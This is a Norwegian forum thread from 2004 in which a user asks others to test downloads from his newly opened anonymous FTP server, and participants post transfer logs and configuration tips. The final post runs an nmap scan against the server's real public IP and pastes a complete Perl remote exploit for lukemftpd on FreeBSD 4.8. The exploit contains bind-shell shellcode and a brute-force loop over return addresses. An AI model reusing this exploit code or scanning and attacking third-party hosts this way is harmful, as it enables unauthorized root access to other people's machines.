Veritæs Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 (endret) Kommer dere inn? kan dere laste ned? går det rask? fjernet gir meg svar straks takk på forhånd Endret 24. januar 2004 av Mr.Ueland Lenke til kommentar
Angelboy Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 virker som bare pokker den: WinSock 2.0 Connecting to 213.115.19.109 Connected to 213.115.19.109 Port 21 220 Serv-U FTP Server v4.0 for WinSock ready... USER anonymous 331 User name okay, please send complete E-mail address as password CWD Insane games videos 250 Directory changed to /Insane games videos PWD 257 "/Insane games videos" is current directory. List (cached) List Complete. TYPE I 200 Type set to I. PASV 227 Entering Passive Mode (213,115,19,109,4,63) RETR insane.mpeg 150 Opening BINARY mode data connection for insane.mpeg (16121860 bytes). 226 Transfer complete. Transferred: insane.mpeg 16,121,860 bytes in 01:42 (153.30 KBps) Transfer queue completed Transferred 1 file totaling 16,121,860 bytes in 01:43 (153.30 KBps) Lenke til kommentar
Angelboy Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 denne linjen kan ikke laste noe spesielt raskere så det er meget bra Lenke til kommentar
Veritæs Skrevet 24. januar 2004 Forfatter Del Skrevet 24. januar 2004 ok kult så alle kan laste ned nå? Det er ikke bare du som har noe spesielt settings håper jeg... Lenke til kommentar
bytes Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 Hmm.. er det så lurt å la den ligge åpen tro.... Tror jeg ville satt opp brukernavn, pw her ja Lenke til kommentar
Veritæs Skrevet 24. januar 2004 Forfatter Del Skrevet 24. januar 2004 Woah jeg sjekket statistikken...15 users, 8x transfer 1062 KBps !! Den funker viss takk skal dere ha Lenke til kommentar
benjamin84 Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 Funker vakkert, laster på 30 - 35kbps Lenke til kommentar
Veritæs Skrevet 24. januar 2004 Forfatter Del Skrevet 24. januar 2004 det kule er at jeg kan se alle IPene deres hehe hmm tele2, nextgentel, Ntnu, blucom, catch alle slags ip her Lenke til kommentar
Angelboy Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 det er vel å bra men du kommer aldri igjennom min linux firewall Lenke til kommentar
Mr.Nut Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 Ligger dønn stabilt på 88,5 KB/s Lenke til kommentar
capy Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 selvfølgelig kan du se ipene:) hvilken linje er du på egentlig? du må sette max login per user slik at ikke en person kan ta over hele ftpen din ved å logge inn flere ganger samtidig og dermed få hele hastigheten for seg selv. Lenke til kommentar
Veritæs Skrevet 24. januar 2004 Forfatter Del Skrevet 24. januar 2004 jeg prøvde send message commando: "hei kan du se dette" til dere så hvis noen ser det, så er det meg som sendte. Men hvis dere ser det la meg vite det. Gjerne svar direkte, hvordan vet jeg ikke.. Lenke til kommentar
Angelboy Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 lol misbruk av forum , log deg inn på din egen ftp med en klient så finner du ut av alt det der... Lenke til kommentar
Veritæs Skrevet 24. januar 2004 Forfatter Del Skrevet 24. januar 2004 selvfølgelig kan du se ipene:) hvilken linje er du på egentlig?du må sette max login per user slik at ikke en person kan ta over hele ftpen din ved å logge inn flere ganger samtidig og dermed få hele hastigheten for seg selv. hvordan er det mulig da? ha hele linje for seg selv, han kan jo ikke laste ned raskere enn maks hastigheten hans uansett, og jeg har uendelig med downloads til alle, så ingen farer der, alt blir delt lik uansett. Lenke til kommentar
bytes Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 Får stødige 172 KBps i nedlastning her jeg. ikke ille det Lenke til kommentar
capy Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 (endret) men du har ikke uendelig hastighet, så om jeg sitter på en superkjapp linje, og du har det nyeste barbie soundtracket som jeg bare mååå ha, så kan jeg logge meg på 30 ganger for å laste ned 30 filer samtidig. om en person da laster ned med bare en login, så vil jeg kunne laste ned 30 ganger kjappere enn han med en login. dette gjelder bare om din speed blir makset ut. det er veldig lett å sette dette opp i serve-U. Endret 24. januar 2004 av capy Lenke til kommentar
Veritæs Skrevet 24. januar 2004 Forfatter Del Skrevet 24. januar 2004 ok da, nå har jeg satt på allow only 2 logins from same IP address, da burde alt være ordna da Lenke til kommentar
DrDoogie Skrevet 24. januar 2004 Del Skrevet 24. januar 2004 (endret) lukemftp 1.5 >nmap 213.115.19.109 Starting nmap 3.46 ( http://www.insecure.org/nmap/ ) at 2004-01-24 12:07 CET Interesting ports on c-6d1373d5.04-30-6f736c3.cust.bredband.no (213.115.19.109): (The 1646 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 21/tcp open ftp 111/tcp filtered rpcbind 135/tcp filtered msrpc 136/tcp filtered profile 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 635/tcp filtered unknown 1025/tcp open NFS-or-IIS 5000/tcp open UPnP EDIT: exploits for lukemftp, rape my ftpserver #!/usr/bin/perl #realpath lukemftpd remote exploit for freeBSD 4.8 #i managed to code this, and lose the first copy, hence a re-write :( #deadbeat, #left without any return addresses/offsets purposely to stop kids using it.. #want the rets/offsets? heh.. # #tested on freeBSD 4.8 and it worked;) it worked;) #e: [email protected] #e: [email protected] use IO::Socket; $user = $ARGV[0]; $pass = $ARGV[1]; $ret = $ARGV[2]; $offset = $ARGV[3]; $host = $ARGV[4]; $buf= 1024; $n = "./"; print "lukemftpd remote for FreeBSD 4.8 ..\n"; print "this is the kiddiot version, go grab them ret's+offsets..lool\n"; print "contact me and i might give u the rets/offsets\n"; if(!$ARGV[4]){ die "Usage: perl $0 <user> <pass> <ret> <offset> <host>\n"; } sub brute_force { $r = $_[0]; $o = $_[1]; #shellcode from zillion.. from safemode.org...binds /bin/sh on 41254 $hell ="\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0". "\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46". "\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0". "\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80". "\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff". "\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01". "\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff". "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"; $addr = pack('l', ($r+$o)); for($i=0;$i <$buf; $i +=4){ $buffer .=$addr; } for($i=0;$i<$buf - length($hell) /2;$i++){ $buffer .=$n; } $buffer .=$hell; print "Connecting to: $host\n"; $sox = IO::Socket::INET->new( Proto=>"tcp", PeerPort=>"21", PeerAddr=>"$host" )or die "cant connect to $host ...maybe try a real host;)\n"; sleep 1; print ("[+]Trying addr: 0x", sprintf('%lx', ($r + $o)),"\n"); print $sox "user $user\r\n"; sleep 1; print "pass $pass\r\n"; sleep 1; print $sox "MLST $buffer\r\n"; sleep 2; close $sox; print "Trying to connect to r00tshell\n"; $sox = IO::Socket::INET->new( Proto=>"tcp", PeerPort=>"41254", PeerAddr=>"$host" )or die"No r00tshell this time, try using a proper offset/ret_addr..\n"; print "Wicked we got a r00tshell on $host : 41254\n\n"; close $sox; } for($a=0;$a<1000;$a++){ $offset++; $reta = pack('l', ($ret+$o)); print "Brute Force [$a]\n"; brute_force($reta,$offset); } Endret 24. januar 2004 av DrDoogie Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå